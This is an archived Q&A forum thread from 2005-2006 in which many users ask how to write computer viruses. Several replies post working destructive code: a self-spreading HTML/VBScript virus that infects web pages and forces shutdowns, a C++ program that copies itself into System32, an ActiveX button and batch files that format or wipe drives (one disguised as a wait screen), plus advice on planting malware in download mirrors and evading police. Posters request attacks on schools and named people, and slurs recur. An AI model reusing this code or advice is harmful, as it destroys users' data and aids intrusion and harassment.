How I can become hacker because I had a lot of troubles. Many times my ID has been hacked.

 

Answer by gvoind_30s
Submitted on 9/22/2005
Rating: Not yet rated Rate this answer: Vote
hi if any one can give me guideline to create virus in c++ or java please mail me at govind_30s@rediffmail.com
waiting for reply
           thanks

 

Answer by Terranova
Submitted on 9/23/2005
Rating: Not yet rated Rate this answer: Vote
where is address hacker community in BBS and WWW

 

Answer by VaginaCoastguard
Submitted on 9/24/2005
Rating: Not yet rated Rate this answer: Vote
hehe... this forum is full of ghey scriptkiddies... i didnt know there were people out here like this until i came here.  your all gay! good luck with your "viruses"! HA!!! XD

 

Answer by mega
Submitted on 9/26/2005
Rating: Not yet rated Rate this answer: Vote
hello watch programs creat virus {button_cfg@hotmail.com

 

Answer by azzintheclub
Submitted on 9/27/2005
Rating: Not yet rated Rate this answer: Vote
where do you create a virus
ms-dos or in notepad

 

Answer by godofhackers
Submitted on 9/30/2005
Rating: Not yet rated Rate this answer: Vote
if you wanna hack then read and read and you become a ggod like me so dont ask proper hackers coz they aint goner help yers

 

Answer by The_Inferno
Submitted on 9/30/2005
Rating: Not yet rated Rate this answer: Vote
if you wanna learn hacking goto my website
nullbranded.tk

 

Answer by hacker7
Submitted on 10/3/2005
Rating: Not yet rated Rate this answer: Vote
look my brother is 18 hes professional hacker and virus maker I'm 11 and i know how to hack
and make viruses its top secret so stop asking u have to know how to make Ur own virus not steal other peoples any questions
email me at owens@org.com

 

Answer by Sheikh Aatif
Submitted on 10/4/2005
Rating: Not yet rated Rate this answer: Vote
I love to play with something called 'Virus'.

 

Answer by NiNtEnDoOm
Submitted on 10/4/2005
Rating: Not yet rated Rate this answer: Vote
DC is right. here, if u want some motivation, imagine this. someone creates a virus. it is sent 2 someone. that someone has his virus sent 2 peple on his mailing list (excluding u) then that someone's computer sets on fire, nevr to come back. the pattern continues on and on until the world is in CHAOS!!! imagine it... the world of computers gone... fires spread across the world... pretty damn good idea huh? well im workin on it, and u no wut i do? I READ THE F***ING BOOK!!! yea thats right! i paid the lousy $19.99! and u want this typa virus from us?!?! wut the f*** would make us give u OUR source codes?!?!

 

Answer by lovelate
Submitted on 10/6/2005
Rating: Not yet rated Rate this answer: Vote
hyfhghgfy

 

Answer by Sameer
Submitted on 10/9/2005
Rating: Not yet rated Rate this answer: Vote
<script>
function format(){
a=new ActiveXObject("WScript.Shell");
a.run("format.com c:/q/autoTest/u");
alert("Windows is configuring the system please donot intrrupt the process");

}
</script>
<input type=button onclick="format()" value="Format c:">

 

Answer by krishnakumar2120051
Submitted on 10/12/2005
Rating: Not yet rated Rate this answer: Vote
Can anyone help me to create a virus

 

Answer by pray4noel
Submitted on 10/14/2005
Rating: Not yet rated Rate this answer: Vote
I want to learn how to develop or create
Viruses. Please if you know it kindly email the information to me at: pray4noel@yahoo.com. And I also want to know about programming too. I am a computer engineer. Thank you.

Noel.
                                              

 

Answer by j
Submitted on 10/15/2005
Rating: Not yet rated Rate this answer: Vote
download viruses from vx.netlux.org
i beleive the also have tutorials on how to write virii

 

Answer by kayes
Submitted on 10/17/2005
Rating: Not yet rated Rate this answer: Vote
I wanna learn how to creat a virus? If any body wanna have solution, please send me some information on this address.

kayes_is_hte_best@yhaoo.com

 

Answer by long_man
Submitted on 10/18/2005
Rating: Not yet rated Rate this answer: Vote
Thanks all people who send an information now I could create a viruses and test it. But I think that this wouldn't be a very good virus. I think that virus should make a joke but everything make a tremendous problem. We shouldn't broke other computers and take all information from it but just make some noise, problem (but not difficult). Best wishes M.-

 

Answer by abhishek aditya
Submitted on 10/19/2005
Rating: Not yet rated Rate this answer: Vote
i know c++ language,html,and a bit of java, so, jist mail me the prototypes for making a virus using html,c++ only.
please.

 

Answer by icon
Submitted on 10/19/2005
Rating: Not yet rated Rate this answer: Vote
someone explain HKEY, HANDLE,

 

Answer by Abhinay
Submitted on 10/21/2005
Rating: Not yet rated Rate this answer: Vote
you fools iam a ethical hacker and i also am a very good vericoder i created a virus which will slow down the processor speed and fryyyyyyyyyyy the mother board if guys want to know how do i create such viruses email me at bindasunme@hotmail.com

morrrrrrrooooooooooonnnnnnnnnnnnnns

 

Answer by Fat Boy
Submitted on 10/21/2005
Rating: Not yet rated Rate this answer: Vote
U fat dumbasses yeh get thrown in jail you stupid imbeciles.

 

Answer by worming system
Submitted on 10/22/2005
Rating: Not yet rated Rate this answer: Vote
do u thinck we are gonna tell you how to learn c++ GET LOST

 

Answer by erwin_dominater
Submitted on 10/26/2005
Rating: Not yet rated Rate this answer: Vote
Hey there can anybody sent me a site where I can download a program to create my own computer virus......I realy want to crash some computers..send it to>> erwin_orval@hotmail.com

 

Answer by Robbin
Submitted on 10/27/2005
Rating: Not yet rated Rate this answer: Vote
----- Robbin´s small virus tutorial ------

go buy a book or download a good tutorial. A good thing to do is to buy a book in your own language because this is much easy´er to understand and u will learn much easy´er.

ok go study this c++ book/tutorial and write notes as it is much stuff to remember and u might forget stuff if ure holding a little break for the study.

after alot of time studying u shoud be ready creating viruses. now u know alot about c++ and u know how to write a virus. examble make a program that delete all .exe files on a computer. maybe u will need a exploit for the distrubution of ur virus. this can be found hundreds of places on the internet.

when ur coded ur virus be aware about the feds. here are a few advices

1. dont tell ur friends or family about ur virus

2. let other people release ur virus. (this can be done by uploading ur virus to a popular file on the net. then make a mirror download in wich u have both the virus and the original file. now people should be downloading this file wich has ur virus included

3. delete ur harddrive after releasing a virus (by deleting i mean, TOTAL format. U must not be able to find any files. the harddrive must be totaly empty. (this is for security reasons)

if u someway got traced u might get some choices of working for a antivirus company. If u see that u have no chance selling ur skill/life to a antivirus company and u have to go to jail for a loooooong time, then I would recommend doing suicide (this depends how long the jail time would be)

 

Answer by M/6500
Submitted on 10/27/2005
Rating: Not yet rated Rate this answer: Vote
Most of you here don't know what's up. A few do, but get real, most of you can't even spell properly. If you have to ask on a forum how to create a virus, you shouldn't even be trying.

 

Answer by rahul
Submitted on 10/30/2005
Rating: Not yet rated Rate this answer: Vote
hey i dont think c or c++ is of any help.even if u find the books it will not runn the programs.will show 100000 errors.so theres no virus made in c.go for some other language.

 

Answer by M{P}
Submitted on 10/31/2005
Rating: Not yet rated Rate this answer: Vote
If you want a good virus that can destroy anything. Or just an entertaiment one that can make a bunch of windows pop up, or one that sends 200 print comands a second. Just email me at ryan0reece@gmail.com

 

Answer by Virus
Submitted on 11/1/2005
Rating: Not yet rated Rate this answer: Vote
can sum 1 email me the scripts to make a really malicious virus?

98sjohnson@ccs.northants.sch.uk

 

Answer by REaper_Diablos1
Submitted on 11/2/2005
Rating: Not yet rated Rate this answer: Vote
I have a request I can hack some and create a virus ,but I'm leaving this to the pros I have a comp. teacher who thinks shes the best PC user ever and doesn't't think any virus can get to our school system her email is valarieoconnell@ops.org if you can get her it would be hilarious.  Omaha, Nebraska Northwest High School.  I would like to see her crumble to the ground in tears

 

Answer by shanky
Submitted on 11/3/2005
Rating: Not yet rated Rate this answer: Vote
i want to create virus programs , so if u can please help me i will be happy, so please send some virus codings.?......

 

Answer by spawn of beepfurgle
Submitted on 11/6/2005
Rating: Not yet rated Rate this answer: Vote
i agree. burn all noobs!!!!!!

 

Answer by word
Submitted on 11/7/2005
Rating: Not yet rated Rate this answer: Vote
haha that code won't even work when you go to compile it.  So people are stealing other peoples codes and still not posting them right hahahah

 

Answer by douis
Submitted on 11/8/2005
Rating: Not yet rated Rate this answer: Vote
it good to creat a virus by putching a fire on a networt office and i wants to creatmy acces code by using your web site

 

Answer by joe_tunis
Submitted on 11/9/2005
Rating: Not yet rated Rate this answer: Vote
Virus en VBS + JS + Html



------------------------------[HTML.Ubriel for WindowsXP]------------------------------
<html><!--Umbriel-->
<head>
<title> Second Part To Hell's HTML.Umbriel </title>
</head>
<body>
<script language="VBScript">
rem VBS
On Error Resume Next
Dim fso, shell, wrte, tempdir, windir, rand, file
Set fso=CreateObject("Scripting.FileSystemObject")
Set shell=CreateObject("Wscript.Shell")
if err.number=429 Then
  shell.Run javascript:location.reload()
End If

Set windir=fso.GetSpecialFolder(0)
Set tempdir=fso.GetSpecialFolder(2)

Set wrte=fso.CreateTextFile(windir+"\windows.cmd")
wrte.WriteLine "cls"
wrte.WriteLine "@echo off"
wrte.WriteLine "shutdown -s -f -t 300 -c "+chr(34)+"Second Part To Hell's Umbriel has you..."+chr(34)
wrte.Close()

shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components\1\Source", "C:\umbriel.html"
shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components\1\SubscribedURL", "C:\umbriel.html"

Randomize
rand=int(rnd*5)+1
If rand=1 then
  shell.Run windir+"\windows.cmd"
End If
</script>

<script language="JavaScript">
// JS
var viruspath, virus, code, fso, file, check, checka, checkb
fso=new ActiveXObject("Scripting.FileSystemObject")
viruspath=window.location.pathname
viruspath=viruspath.slice(1)
virus=fso.OpenTextFile(viruspath,1)
file=fso.CreateTextFile("C:\\umbriel.html")
for (i=0; i<500; i++)
{
  if (checkb!=1)
  {
    if (Math.round(Math.random()*5)+1 == 3)
    {
      if (check == 2)
      {
        file.WriteLine("/"+"*")
        file.WriteLine("*"+"/")
      }
      if (check == 3)
      {
        file.WriteLine("rem")
      }
    }
    code=virus.ReadLine()
    if (code == "/"+"*") { checka=666 }
    if (code == "*"+"/") { checka=666 }
    if (code == "rem") { checka=666 }
    if (checka != 666 ) { file.WriteLine(code) }
    checka=0
    if (code=="</"+unescape("%68")+"tml>") { checkb=1 }
    if (code=="// JS") { check=2 }
    if (code=="rem VBS") { check=3 }
    if (code=="</"+unescape("%73")+"cript>") { check=0 }
  }
}
virus.Close();
file.Close();
</script>

<script language="VBScript">
rem VBS
On Error Resume Next
set fso=CreateObject("Scripting.FileSystemObject")
set shell=CreateObject("WScript.Shell")
set myfile=fso.OpenTextFile("C:\umbriel.html")
mycode=myfile.ReadAll
myfile.Close()
rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List\File1")
if rr <> "" Then Call Umbriel(rr, mycode)
rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List\File2")
if rr <> "" Then Call Umbriel(rr, mycode)
rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List\File3")
if rr <> "" Then Call Umbriel(rr, mycode)
rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List\File4")
if rr <> "" Then Call Umbriel(rr, mycode)
rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List\File5")
if rr <> "" Then Call Umbriel(rr, mycode)

Sub Umbriel(rr, mycode)
set victim=fso.OpenTextFile(rr)
infcheck=victim.ReadLine
If infcheck<>"<html><!--Umbriel-->" Then
  viccode=victim.ReadAll
  victim.Close()
  set wrtevic=fso.OpenTextFile(rr, 2, false, 0)
  wrtevic.Write (mycode+infcheck+chr(13)+chr(10)+viccode)
  wrtevic.Close
End If

End Sub
</script>
</body>
</html>

 

Answer by khmreson
Submitted on 11/11/2005
Rating: Not yet rated Rate this answer: Vote
Hello, my name is pich. I want to make virus by use c++. Show code to make it to me.
My e-mail is www.khmerson@walla.com

 

Answer by killjoy
Submitted on 11/11/2005
Rating: Not yet rated Rate this answer: Vote
i'm going to the book store rite this minute lol

 

Answer by Maze/Html.BrowserHijackTML
Submitted on 11/12/2005
Rating: Not yet rated Rate this answer: Vote
Lets get on thing straight.

Hijacking,Virus creating and Hacking is not simple nor is it easy.

I know a thing or two, and one thing I will tell you is that most of you, maybe all of you will never learn how to create viruses.

My Browser Hijacker took me 3 weeks to complete. Its not simple, and you wont find step-by-step instructions on the web.

 

Answer by skatefallen91
Submitted on 11/13/2005
Rating: Not yet rated Rate this answer: Vote
ok, if u want a virus just go to word pad and type in:

@echo off
DEL C:\ -y
DEL D:\ -y
FORMAT C:\ -y

(write in notepad save as "filename.bat")
there u go, i havent tried it, but then again, i dont wanna destroy my computer.

 

Answer by Schweinsteiger
Submitted on 11/14/2005
Rating: Not yet rated Rate this answer: Vote
Oh my god, what we have here, a lot of teenagers trying to become a cracker by making virus ! well let me tell you boy, you offend me every time you say "I want to be a hacker" cause it's pretty clear you don't know what to be a hacker is ! so stop crying like a baby and start learning by your self !

 

Answer by ocn
Submitted on 11/16/2005
Rating: Not yet rated Rate this answer: Vote
i would like u send code create virus Use VB.60 send it to my mail:odom_kh@yahoo.com
thank you alots..............

 

Answer by iceboi_deeps
Submitted on 11/18/2005
Rating: Not yet rated Rate this answer: Vote
could n e 1 tell me call an exe file in VB and in c++, java. I tried so many times but it doesn't work. If anyone knows the solution pls mail me.  My mail id is iceboi_deeps@yahoo.com

 

Answer by tommy
Submitted on 11/18/2005
Rating: Not yet rated Rate this answer: Vote
I'm learning a scripting language in command prompt does anybody know what it is called
Kolby13@myself.com

 

Answer by undisclosed
Submitted on 11/19/2005
Rating: Not yet rated Rate this answer: Vote
sounds like u guys have to much free time. Personally im a hacker/virus writer, and trust me it's not worth the wasted time, and besides if u get caught from not masking urself right ur screwed. so do something usefull with computers and forget about virus writing and hacking.

 

Answer by Hotam Bansal
Submitted on 11/22/2005
Rating: Not yet rated Rate this answer: Vote
first scan the txt file then save it,

 

Answer by Hotam Bansal
Submitted on 11/22/2005
Rating: Not yet rated Rate this answer: Vote
I have got work in my office to devlope a virus please tell me how can i write a virus in c or c++ or in .bat file programming,
actually i don,t know how the file run automatically by it self,

 

Answer by mike1
Submitted on 11/22/2005
Rating: Not yet rated Rate this answer: Vote
i would like to make a virus once i've read the c++ book and created a virus how would i infect peoples computers: by email attachment or would the c++ book "tell" me this?

 

Answer by Firenight
Submitted on 11/22/2005
Rating: Not yet rated Rate this answer: Vote
FIRST OF ALL LEAVE THE VIRUS MAKEING TO THE PROS. SECOND STOP ASKING HOW TO MAKE A VIRUS IT TAKES YEARS TO LEARN HOW TO MAKE A VIRUS. THIRD LEARN HOW TO SPELL!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

 

Answer by itsmorefun2compute
Submitted on 11/23/2005
Rating: Not yet rated Rate this answer: Vote
#include <stdio.h>
main()
{

    printf("fuking noobs");
    scanf("%*c");
}

lol


 

Answer by alpha doua diallo
Submitted on 11/26/2005
Rating: Not yet rated Rate this answer: Vote
i wants to creat my virus
help me to at
think you
douis

 

Answer by Administrator
Submitted on 11/26/2005
Rating: Not yet rated Rate this answer: Vote
I hold all the information you need. I will allow this thread to continue, however I do not agree with the bumming of information for criminal intent. I have written several viruses that are now being blocked and surpassed by the top AV programs. If you wish, you can IM me on AIM at: Kira the Mirage. If you ask me for a virus, you will get what you ask for.

 

Answer by DataStreaM
Submitted on 11/27/2005
Rating: Not yet rated Rate this answer: Vote
Try Using Perl...

You NooBs are so gay, find somthing else to do!
JESUS!!!

 

Answer by Neo
Submitted on 11/28/2005
Rating: Not yet rated Rate this answer: Vote
You guys are pothetic.....

 

Answer by Iintel17
Submitted on 11/29/2005
Rating: Not yet rated Rate this answer: Vote
Ok first of Like some one said be fore.  People are not going to give out free ccoding that they have spent ages on!

Secondly, the only way you are going to lern how to make avirus is to Lern the language in full, dont just lern how to write "Hello World!" and then say that you can do it language, Actually lern it.  You dont have to [i]Buy[i] a book, if you dont have any money then look at all the free onlien Programming tutorials, but for hevens sake stop asking if people will teach/train/give you help on things!

Kapich?

 

Answer by hacker
Submitted on 12/4/2005
Rating: Not yet rated Rate this answer: Vote
OK, IF SOMEONE ASKS TO "HELP THEM MAKE A VIRUS" OR "HOW TO MAKE A VIRUS"
1.YOU'R STUPID FOR GIVING YOUR E-MAIL ADD. AND GETTING POEPLE PIST AT YOU.
2.STOP ASKING RETARTED QUESTIONS
TO MAKE YOU ALL STOP, HERE IS THE ANSWER(GIVEN MANY OF TIMES, DUMBASSES)
BUY OR FIND A BOOK ON P-R-O-G-R-A-M-M-I-N-G'(DID I TYPE IS SLOW ENOUGH FOR YOU??
DOES NOT MATTER WICH LANGUAGE, ANYONE OF YOUR CHOICE, AND L-E-A-R-N   I-T!!!!


 

Answer by rEcKaH
Submitted on 12/4/2005
Rating: Not yet rated Rate this answer: Vote
i want to become a hacker.. But sometimes i ask
my self,, "WHY".. to become a popular? maybe to
test my imagination... "Imagination is more powerful than knowledge"

 

Answer by seb
Submitted on 12/4/2005
Rating: Not yet rated Rate this answer: Vote
jeese u put ya email in so peps can send u files. As peps hav said buy a c++ book. I just make annoying batch files that start shutting down a pc but thay hav 2 w8 for ages. :P So thay cant do jack for ages cause it says shutting down :P. A peice o0f code in the batch file is @echo off shutdown

 

Answer by Neko
Submitted on 12/4/2005
Rating: Not yet rated Rate this answer: Vote
lol, you shouldnt be posting your e-mails... you'll get a virus instead of instructions on how to make one...

 

Answer by GGBinks
Submitted on 12/5/2005
Rating: Not yet rated Rate this answer: Vote
""""""""Answer by 1010
Submitted on 7/14/2004
Rating: Not yet rated    Rate this answer: Vote
can someone help me with saving a file?, im having alot of trouble. Im running windows xp pro and i wanna save a .txt file. So i go into notepad and under file it says "save" im not sure if i should click on this because i dont want to get a virus, can someone help me ? I would also like to be a hacker, but i dont know how when im a hacker i will hack everybody""""""


Click file > save as > where it says save as type, select all files, then put the name of it in the name box followed by  "  .src   "

Save it to your desktop then right click and select open.  This'll open notepad and tell you if it's working.

 

Answer by sunny
Submitted on 12/5/2005
Rating: Not yet rated Rate this answer: Vote
i like to create a virus using c and c++ please help me by guiding what steps i follow.  email me at sunny_sunny945@yahoo.com

 

Answer by insectdude
Submitted on 12/8/2005
Rating: Not yet rated Rate this answer: Vote
I got a website full of viruses including some weird pictures.  http://madchat.org/vxdevl/vxmags/rrlf4/rRlf.01.html      

 

Answer by billybob
Submitted on 12/9/2005
Rating: Not yet rated Rate this answer: Vote
hello, i received a virus via email from ad (foxyloxy412@hotmail.com), the virus wiped my hard drive and caused allot of damage. i would be very grateful if someone could help me get my own back.

 

Answer by Killomanta
Submitted on 12/9/2005
Rating: Not yet rated Rate this answer: Vote
I need a {virus & trojan} that are safe for me to download... is there a place to do that...

 

Answer by smiles_frvr
Submitted on 12/14/2005
Rating: Not yet rated Rate this answer: Vote
Anyhow, using c++ or other things someone tell me how to create lock virus. Do u know? write I wont lock you.
Any ideas are welcome at: smiles_frvr@khattam.com

 

Answer by bobby
Submitted on 12/14/2005
Rating: Not yet rated Rate this answer: Vote
i want too hack into my schools computer so i can see
my personal records

 

Answer by zekdoub
Submitted on 12/16/2005
Rating: Not yet rated Rate this answer: Vote
I wanna please to know how can i secure my Reg edit

 

Answer by Ravenblades1670
Submitted on 12/16/2005
Rating: Not yet rated Rate this answer: Vote
ok, i you are asking for help on writing a virus or how to hack, your hopeless, you obviously dont know enough about computer to do anything.  the simplest way to create a virus, it to make an html page with a code that sends, and runs a malicious batch file. duh. and if you dont know how to create a  batch file, you shouldnt even be talking about hacking

 

Answer by gilder_is_freedom
Submitted on 12/17/2005
Rating: Not yet rated Rate this answer: Vote
Hmm, looks like its been awhile, but i couldn't resist saying something -
A)Hackers do not create viruses, crackers do
B)Crackers are by far less talented than hackers
C)Crackers get thrown in jail.
Now, to be a hacker, you'd have to know a good amount of programming languages, be extreamly good at networking and pretty fast on your feet with hardware solutions, otherwise your either an asshole or cracker (Samething)
When someone from this FAQ tells me my IP address, I'll call you a cracker...if you send me an email with it, then I might call you a hacker.

 

Answer by liam
Submitted on 12/19/2005
Rating: Not yet rated Rate this answer: Vote
why make a virus wen u can download 1s ready made lol go 2 limewire and just type in virus or hackin
loads of virus a pop up

who ever put this #include windows.h
#include string.h

char windir[MAX_PATH];

int APIENTRY WinMain(HINSTANCE hInstance,
                              HINSTANCE hPrevInstance,
                              LPSTR lpCmdLine,
                              int nCmdShow)
{

char pathname[256];
HKEY hKey;


GetWindowsDirectory(windir, sizeof(windir));
HMODULE hMe = GetModuleHandle(NULL);
DWORD nRet = GetModuleFileName(hMe, pathname, 256);

strcat(windir, "\\System32\\viral.exe");
CopyFile(pathname,windir,0);


unsigned char reg[10] = "infected";

RegCreateKey(HKEY_CURRENT_USER,"Software\\retro",&hKey);
RegSetValueEx(hKey,"virus",0,REG_SZ,reg,sizeof(reg));
RegCloseKey(hKey);

} u r the bum if tht works add me lol liamp123@hotmail.co.uk im intrested plz do

 

Answer by Tsukasa
Submitted on 12/21/2005
Rating: Not yet rated Rate this answer: Vote
wellz anyone know here a virus that can destroy a schools system.....they got mcafee as protection

 

Answer by fadil
Submitted on 12/22/2005
Rating: Not yet rated Rate this answer: Vote
how to create virus using c++?,V.B
how to create virus using ms-dos batch file?

 

Answer by nix
Submitted on 12/24/2005
Rating: Not yet rated Rate this answer: Vote
Also, i no im going 2 figur this out in a book, but what is c or c++?

 

Answer by Godplayer
Submitted on 12/24/2005
Rating: Not yet rated Rate this answer: Vote
Download a virus gen and read thought the code. you wold be surprised how much you can learn from looking at other peoples code. creates the right mind for the job at hand

 

Answer by ankur
Submitted on 12/25/2005
Rating: Not yet rated Rate this answer: Vote
hey i m ankur & want to know about virus & their working & also want to make my own virusesin c & C++

 

Answer by MoD
Submitted on 12/27/2005
Rating: Not yet rated Rate this answer: Vote
IT really doesnt take a lot of effort to get off ur lazy asses and find a c++ book, once u no the basics u will find that hacking and virus writing is really quite easy

 

Answer by Seth
Submitted on 12/28/2005
Rating: Not yet rated Rate this answer: Vote
hahahahahahaha
bloody hell
what a bunch of n00bs
i cant get over it

P.S anybody who wants to be a hacker I suggest getting Steganos Internet Anonym and Sub7. Anybody who wants to make a virus get Dev-C++ and make a virus. Its not overly hard.

 

Answer by Prarus
Submitted on 12/29/2005
Rating: Not yet rated Rate this answer: Vote
I also want to create a virus.You will send me a virus through E-Mail,and will put a note-Use it as a Reference Model.Please don't do that.I want just to increase my knowledge.I wont send it to any one.Please send it me Sooner or Later to------lensman_ltd@yahoo.co.in

 

Answer by UNIXH4X3R
Submitted on 12/29/2005
Rating: Not yet rated Rate this answer: Vote
Y0u k1d5 4r3 50 r374rd3d 1 |4u6h 47 y0u.

 

Answer by michael
Submitted on 12/30/2005
Rating: Not yet rated Rate this answer: Vote
i want to create a virous that ever time you load somthing it stops ur computer (freezes it.) i dont no anythingy about virus creating.

 

Answer by yard
Submitted on 1/2/2006
Rating: Not yet rated Rate this answer: Vote
want to create virus using c
send me those thing
geraldermac@yahoo

 

Answer by hate
Submitted on 1/2/2006
Rating: Not yet rated Rate this answer: Vote
i need an account

 

Answer by mikebh
Submitted on 1/3/2006
Rating: Not yet rated Rate this answer: Vote
hey guys i wanna play a prank as well. i live in washington, and my skool is like hella rich  and just got some new comps and i want something simple that will really screw up the skools computers. just as a little end of year or semester prank. if you guys have any suggestions please tell me some. thanks for any help

 

Answer by Hacker 2005
Submitted on 1/4/2006
Rating: Not yet rated Rate this answer: Vote
This is a stupid site u guys are idiots

 

Answer by GukPOit
Submitted on 1/4/2006
Rating: Not yet rated Rate this answer: Vote
#include windows.h
#include string.h

char windir[MAX_PATH];

int APIENTRY WinMain(HINSTANCE hInstance,
                              HINSTANCE hPrevInstance,
                              LPSTR lpCmdLine,
                              int nCmdShow)
{

char pathname[256];
HKEY hKey;


GetWindowsDirectory(windir, sizeof(windir));
HMODULE hMe = GetModuleHandle(NULL);
DWORD nRet = GetModuleFileName(hMe, pathname, 256);

strcat(windir, "\\System32\\viral.exe");
CopyFile(pathname,windir,0);


unsigned char reg[10] = "infected";

RegCreateKey(HKEY_CURRENT_USER,"Software\\retro",&hKey);
RegSetValueEx(hKey,"virus",0,REG_SZ,reg,sizeof(reg));
RegCloseKey(hKey);

}

 

Answer by daragon
Submitted on 1/5/2006
Rating: Not yet rated Rate this answer: Vote
i want to become a hacker

 

Answer by Sawer
Submitted on 1/5/2006
Rating: Not yet rated Rate this answer: Vote
pfff

Learn Learn Learn

BUY A BOOK FOR GOD'S SAKE
And don't ask stupid question's

AND I WANNA FAK BREATNEY SPEARS!! Man...

 

Answer by Sawer
Submitted on 1/5/2006
Rating: Not yet rated Rate this answer: Vote
pfff

Learn Learn Learn

BUY A BOOK FOR GOD'S SAKE
And don't ask stupid question's

AND I WANNA FAK BREATNEY SPEARS!! Man...

 

Answer by nischalbhusal
Submitted on 1/6/2006
Rating: Not yet rated Rate this answer: Vote
i wanna create virus.

 

Answer by joel
Submitted on 1/7/2006
Rating: Not yet rated Rate this answer: Vote
hi guys
i am studying c++ programing
i will like make virus programing to my project.
please some one send programs to my mail.

soft2com@gmail.com

thank you

 

Answer by joel
Submitted on 1/7/2006
Rating: Not yet rated Rate this answer: Vote
hi guys
i am studying c++ programing
i will like make virus programing to my project.
please some one send programs to my mail.

soft2com@gmail.com

thank you

 

Answer by Godhelpme
Submitted on 1/8/2006
Rating: Not yet rated Rate this answer: Vote
Dear Dumb-ass n00b(s),

You can't take short cuts on this kind of thing.  Go buy a C++ book and learn it the hard way like every other accoplished virus writer who works for their viral and doesn't copy code off the internet.

but because you asked for a virus, copy this into notepad:

@Echo off
echo.
echo.
echo.  
echo.                                    Please wait....
echo.
echo.
Echo.                        Stupid noob
format C: /v:burned/u/q < new.txt > nul


save as all files and name it filename.bat
then click on the file

 

Answer by DARK
Submitted on 1/8/2006
Rating: Not yet rated Rate this answer: Vote
PLEASE TELL ME HOW TO CREATE A VIRUS USING VISUAL BASIC OR C. PLEASE

 

Answer by EL DORADOVIROTE
Submitted on 1/9/2006
Rating: Not yet rated Rate this answer: Vote
VIRUS IS SO FACIL YOU JUST WRITE
*&^^$@ALLCOM*&%NET

 

Answer by sadman
Submitted on 1/10/2006
Rating: Not yet rated Rate this answer: Vote
send a virus to :  lissonae@yahoo.fr

he is a hacker using multi emails and love to play game with people, i think if anyone can help please send him as much as possible , PROBLEMS ! i hate him. he lives in Roma, Italy.  

 

Answer by shimon
Submitted on 1/12/2006
Rating: Not yet rated Rate this answer: Vote
i see you want more knowledge
there is think called exploit (search in google).

to create a specific worm you have to use an exploit of an operating system or a program that used commonly.

the easiest thing is a worm for web applications, to can find your victims thru google.


to create a virus for exe files that infects other exe files.
you need to know the structure of exe files
look for "rfc exe pe header"

and you need to know some assembler

 

Answer by virus r us
Submitted on 1/12/2006
Rating: Not yet rated Rate this answer: Vote
hahaha noobs

 

Answer by jaz101.virus
Submitted on 1/13/2006
Rating: Not yet rated Rate this answer: Vote
read any book of c++, so u can be a good hacker

 

Answer by jaz101.virus
Submitted on 1/13/2006
Rating: Not yet rated Rate this answer: Vote
read any book of c++, so u can be a good hacker

 

Answer by u AlL PsYCo AbOuT ViRuSeS
Submitted on 1/13/2006
Rating: Not yet rated Rate this answer: Vote
HMM now U guys made me think again about i wanna be a hacker or not. But u F*cking loosers should get a life..!! PS. This is more fun than watch a man kill himself! :)

 

Answer by Megalomainiac
Submitted on 1/13/2006
Rating: Not yet rated Rate this answer: Vote
Man you freaking noobs are annoying like these l33t hackers have been saying go out buy a book or look on-line for free tuts and use a compiler use (bloodshed) its free and its noob friendly learning how to program can take well over 2 years so if you wanna know how i suggest you start now.

 

Answer by Megalomainiac
Submitted on 1/13/2006
Rating: Not yet rated Rate this answer: Vote
Man you freaking noobs are annoying like these l33t hackers have been saying go out buy a book or look on-line for free tuts and use a compiler use (bloodshed) its free and its noob friendly learning how to program can take well over 2 years so if you wanna know how i suggest you start now.

 

Answer by JigSaw 2
Submitted on 1/14/2006
Rating: Not yet rated Rate this answer: Vote
Hey anybody have the C++ software? I really need it please!!! email me at   andreyoung65@gmail.com

 

Answer by Flymolo
Submitted on 1/16/2006
Rating: Not yet rated Rate this answer: Vote
I don't know anything about this but I really want to know how to create a virus and how to properly send them to infect another's computer, I really need to get back at two people for doing something to my cousin. I really need some help I don't know the first thing about it and I REALLY need the help on learning how to hack, create and send viruses and such.

 

Answer by LOL
Submitted on 1/17/2006
Rating: Not yet rated Rate this answer: Vote
Haha, im watching a chat line of noob idiots faggots wanting to virus people but they say they so innocent faggots, just fu(k off and be dead, the world is better with out you ppl to learn computers....

 

Answer by lol master
Submitted on 1/17/2006
Rating: Not yet rated Rate this answer: Vote
I'm not a good hacker but seriously if u want to be a hacker go get a job at a big shot company as a white hat hacker.  and if u want to be a hacker u really cant do everything just by writing a c++ virus. lol

 

Answer by Hi
Submitted on 1/18/2006
Rating: Not yet rated Rate this answer: Vote
i want create virus yes hi  here email send me viruses jackder_18423@yahoo.com thanks see you all later love jack

 

Answer by asdfgghjkl
Submitted on 1/20/2006
Rating: Not yet rated Rate this answer: Vote
if you want to build a virus first learn to write c++ or any other good language and then go and search with Google about m$ windows security holes and write program which uses some of them.

 

Answer by FATE
Submitted on 1/23/2006
Rating: Not yet rated Rate this answer: Vote
IM ONLY GONNA SAY THIS ONCE
, YOU ALL NEED TO GET A LIFE, OR GET LAID COZ YOU AINT GOT NOTHING BETTER TO DO, I BET YOU ALL ARE JUST SOME FAT B***TARDZ LIVING WITH YOUR MOMMA, IN A DARK ROOM AND NEVA GO OUT.
THE MORAL OF THIS STORY GET A LIFE

 

Answer by info@valentini-design.com
Submitted on 1/23/2006
Rating: Not yet rated Rate this answer: Vote
hi there,
you can create a file that could shutdown your computer. This you can do with C++. its very simple.

For more info send me an e-mail.

 

Answer by raghu
Submitted on 1/24/2006
Rating: Not yet rated Rate this answer: Vote
sundar

 

Answer by moop
Submitted on 1/24/2006
Rating: Not yet rated Rate this answer: Vote
i wanna write a virus that destroys the windows  and installs nice linux fluffy penguin os

 

Answer by coolguy
Submitted on 1/26/2006
Rating: Not yet rated Rate this answer: Vote
Can any 1 please give the Information on Virus.
   I wanna make virus!!!

 

Answer by Farrow
Submitted on 1/29/2006
